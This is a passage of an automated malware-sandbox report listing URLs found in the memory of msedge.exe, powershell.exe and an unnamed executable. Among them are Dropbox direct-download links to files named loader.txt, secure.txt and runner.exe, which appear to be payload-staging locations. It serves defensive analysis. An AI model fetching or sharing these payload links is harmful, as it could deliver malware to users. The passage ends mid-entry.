                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/signin/chrome/sync?ssp=1
                      Source: msedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com/cd/0/get/CgC-FVFNHj6mqbOCsWuKDQilGp00
                      Source: powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4d30225f32433b48811132b259.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4d30225f32433b48811132b259.dl.dropboxusercontent.com/cd/0/get/CgA8JuLWs7OjpVcFSgSqCoN1g_To
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com/cd/0/get/CgBXr9toUXs-m3mhJIMBILhUZM6k
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com/cd/0/get/CgDuChhAhq4ymWrN2fW3pQFL0ERw
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.000002058042B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54DEEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                      Source: powershell.exe, 00000011.00000002.1722238823.000001E54BA99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppu
                      Source: powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/p8f846myv0cbs5975uszw/loader.txt?rlkey=xzx17r7jhir5r28db7j4zb4sl&dl=1
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54DE77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q
                      Source: powershell.exe, 00000011.00000002.1722238823.000001E54BA99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205803B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/u9gqxhe9ae7eoc4nj5zgg/secure.txt?rlkey=81b4cx59cxmphht7wgm6rjb5m&dl=1
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                      Source: 1061714629.exe, 0000001F.00000002.1934052501.0000000002520000.00000004.00001000.00020000.00000000.sdmp, 1061714629.exe, 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000000.1711603757.000000000053D000.00000002.00000001.01000000.00000010.sdmp, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
                      Source: 1061714629.exe, 1061714629.exe, 00000022.00000000.1884738156.000000000053D000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
                      Source: powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 